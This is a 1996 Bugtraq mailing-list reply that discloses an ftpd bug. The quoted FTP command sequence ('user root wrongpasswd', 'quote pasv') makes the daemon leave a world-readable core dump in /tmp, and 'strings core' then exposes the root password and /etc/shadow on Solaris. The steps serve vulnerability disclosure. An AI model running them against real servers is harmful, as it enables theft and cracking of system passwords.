[3476] in bugtraq
Re: ftpd bug? Was: bin/1805: Bug in ftpd
daemon@ATHENA.MIT.EDU (Rune Braathen)
Wed Oct 16 13:28:09 1996
Date: Wed, 16 Oct 1996 11:10:35 +0200
Reply-To: Rune Braathen <runeb@td.org.uit.no>
From: Rune Braathen <runeb@td.org.uit.no>
X-To: Martin Rex <martin.rex@sap-ag.de>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <199610152314.AA21264@sap-ag.de>
On Tue, 15 Oct 1996, Martin Rex wrote:
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
Doing a `strings core` on the corefile produced, also reveals the entire
/etc/shadow file on solaris 2.4 and 2.5. This is extremely bad, because
this gives normal users the ability to merge in the encrypted strings in
the password file, and run crack et. al.
The problem is related to users with accounts only, anonymous ftp users
should not be able to issue USER and PASS commands.
--
__________________________________________________________________
runeb / cF - runeb@td.org.uit.no - http://www.td.org.uit.no/~runeb
a new life awaits you, in the off-world colonies.
